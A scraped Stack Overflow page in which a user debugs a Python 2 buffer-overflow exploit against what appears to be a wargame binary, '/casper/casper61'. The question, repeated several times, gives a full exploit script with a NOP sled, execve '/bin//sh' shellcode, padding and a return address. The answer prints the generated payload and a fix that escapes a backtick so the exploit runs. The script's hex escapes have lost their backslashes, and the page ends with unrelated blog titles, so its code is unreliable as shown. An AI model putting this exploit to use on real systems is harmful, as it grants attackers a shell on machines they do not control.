Python script issue: “sh: 1: Syntax error: EOF in backquote substitution”





.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{ height:90px;width:728px;box-sizing:border-box;
}







-2















When I try to execute the following script:



#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40

shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()


I got this error:




sh: 1:Syntax error: EOF in backquote substitution.




I have another similar script that in which only the buffer address is different which works without any problem.



Can someone help me? Thanks










share|improve this question




















  • 1





    It looks like your shebang is wrong. You probably want either #!/usr/bin/python or #!/usr/bin/env python

    – shay
    Nov 23 '18 at 17:35











  • Python 2 or 3 ?

    – Pedro Lobito
    Nov 23 '18 at 17:35











  • @shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python

    – hellballer
    Nov 23 '18 at 17:38











  • @PedroLobito i'm using version 2.7.6

    – hellballer
    Nov 23 '18 at 17:44


















-2















When I try to execute the following script:



#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40

shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()


I got this error:




sh: 1:Syntax error: EOF in backquote substitution.




I have another similar script that in which only the buffer address is different which works without any problem.



Can someone help me? Thanks










share|improve this question




















  • 1





    It looks like your shebang is wrong. You probably want either #!/usr/bin/python or #!/usr/bin/env python

    – shay
    Nov 23 '18 at 17:35











  • Python 2 or 3 ?

    – Pedro Lobito
    Nov 23 '18 at 17:35











  • @shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python

    – hellballer
    Nov 23 '18 at 17:38











  • @PedroLobito i'm using version 2.7.6

    – hellballer
    Nov 23 '18 at 17:44














-2












-2








-2








When I try to execute the following script:



#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40

shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()


I got this error:




sh: 1:Syntax error: EOF in backquote substitution.




I have another similar script that in which only the buffer address is different which works without any problem.



Can someone help me? Thanks










share|improve this question
















When I try to execute the following script:



#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "x90"*40

shellcode="x31xc0x50x68x2fx2fx78x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
buf_addr= "x60x98x04x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()


I got this error:




sh: 1:Syntax error: EOF in backquote substitution.




I have another similar script that in which only the buffer address is different which works without any problem.



Can someone help me? Thanks







python bash






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Nov 23 '18 at 17:46







hellballer

















asked Nov 23 '18 at 17:30









hellballerhellballer

116




116








  • 1





    It looks like your shebang is wrong. You probably want either #!/usr/bin/python or #!/usr/bin/env python

    – shay
    Nov 23 '18 at 17:35











  • Python 2 or 3 ?

    – Pedro Lobito
    Nov 23 '18 at 17:35











  • @shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python

    – hellballer
    Nov 23 '18 at 17:38











  • @PedroLobito i'm using version 2.7.6

    – hellballer
    Nov 23 '18 at 17:44














  • 1





    It looks like your shebang is wrong. You probably want either #!/usr/bin/python or #!/usr/bin/env python

    – shay
    Nov 23 '18 at 17:35











  • Python 2 or 3 ?

    – Pedro Lobito
    Nov 23 '18 at 17:35











  • @shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python

    – hellballer
    Nov 23 '18 at 17:38











  • @PedroLobito i'm using version 2.7.6

    – hellballer
    Nov 23 '18 at 17:44








1




1





It looks like your shebang is wrong. You probably want either #!/usr/bin/python or #!/usr/bin/env python

– shay
Nov 23 '18 at 17:35





It looks like your shebang is wrong. You probably want either #!/usr/bin/python or #!/usr/bin/env python

– shay
Nov 23 '18 at 17:35













Python 2 or 3 ?

– Pedro Lobito
Nov 23 '18 at 17:35





Python 2 or 3 ?

– Pedro Lobito
Nov 23 '18 at 17:35













@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python

– hellballer
Nov 23 '18 at 17:38





@shay it is a typo in the post here. My bad, btw in my code I'm using #!/usr/bin/python

– hellballer
Nov 23 '18 at 17:38













@PedroLobito i'm using version 2.7.6

– hellballer
Nov 23 '18 at 17:44





@PedroLobito i'm using version 2.7.6

– hellballer
Nov 23 '18 at 17:44












1 Answer
1






active

oldest

votes


















0














The generated exploit contains a ` (backquote/backtick) which causes the error, escaping it should fix it.



'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'




payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')





share|improve this answer
























  • It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.

    – hellballer
    Nov 23 '18 at 17:52











  • You're welcome, glad it works! Regarding your comment, I've no idea ;-)

    – Pedro Lobito
    Nov 23 '18 at 17:55






  • 1





    Well, thank you anyway :)

    – hellballer
    Nov 23 '18 at 18:03












Your Answer






StackExchange.ifUsing("editor", function () {
StackExchange.using("externalEditor", function () {
StackExchange.using("snippets", function () {
StackExchange.snippets.init();
});
});
}, "code-snippets");

StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "1"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});














draft saved

draft discarded


















StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53450871%2fpython-script-issue-sh-1-syntax-error-eof-in-backquote-substitution%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









0














The generated exploit contains a ` (backquote/backtick) which causes the error, escaping it should fix it.



'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'




payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')





share|improve this answer
























  • It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.

    – hellballer
    Nov 23 '18 at 17:52











  • You're welcome, glad it works! Regarding your comment, I've no idea ;-)

    – Pedro Lobito
    Nov 23 '18 at 17:55






  • 1





    Well, thank you anyway :)

    – hellballer
    Nov 23 '18 at 18:03
















0














The generated exploit contains a ` (backquote/backtick) which causes the error, escaping it should fix it.



'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'




payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')





share|improve this answer
























  • It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.

    – hellballer
    Nov 23 '18 at 17:52











  • You're welcome, glad it works! Regarding your comment, I've no idea ;-)

    – Pedro Lobito
    Nov 23 '18 at 17:55






  • 1





    Well, thank you anyway :)

    – hellballer
    Nov 23 '18 at 18:03














0












0








0







The generated exploit contains a ` (backquote/backtick) which causes the error, escaping it should fix it.



'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'




payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')





share|improve this answer













The generated exploit contains a ` (backquote/backtick) which causes the error, escaping it should fix it.



'/casper/casper61 xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x90xc2x901xc3x80Ph//xhh/binxc2x89xc3xa3Pxc2x89xc3xa2Sxc2x89xc3xa1xc2xb0x0bxc3x8dxc2x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\`<-HERExc2x98x04x08'




payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\`')






share|improve this answer












share|improve this answer



share|improve this answer










answered Nov 23 '18 at 17:46









Pedro LobitoPedro Lobito

50.6k16138172




50.6k16138172













  • It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.

    – hellballer
    Nov 23 '18 at 17:52











  • You're welcome, glad it works! Regarding your comment, I've no idea ;-)

    – Pedro Lobito
    Nov 23 '18 at 17:55






  • 1





    Well, thank you anyway :)

    – hellballer
    Nov 23 '18 at 18:03



















  • It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.

    – hellballer
    Nov 23 '18 at 17:52











  • You're welcome, glad it works! Regarding your comment, I've no idea ;-)

    – Pedro Lobito
    Nov 23 '18 at 17:55






  • 1





    Well, thank you anyway :)

    – hellballer
    Nov 23 '18 at 18:03

















It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.

– hellballer
Nov 23 '18 at 17:52





It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the ` char to be precise). Thanks again.

– hellballer
Nov 23 '18 at 17:52













You're welcome, glad it works! Regarding your comment, I've no idea ;-)

– Pedro Lobito
Nov 23 '18 at 17:55





You're welcome, glad it works! Regarding your comment, I've no idea ;-)

– Pedro Lobito
Nov 23 '18 at 17:55




1




1





Well, thank you anyway :)

– hellballer
Nov 23 '18 at 18:03





Well, thank you anyway :)

– hellballer
Nov 23 '18 at 18:03




















draft saved

draft discarded




















































Thanks for contributing an answer to Stack Overflow!


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53450871%2fpython-script-issue-sh-1-syntax-error-eof-in-backquote-substitution%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







這個網誌中的熱門文章

Tangent Lines Diagram Along Smooth Curve

Yusuf al-Mu'taman ibn Hud

Zucchini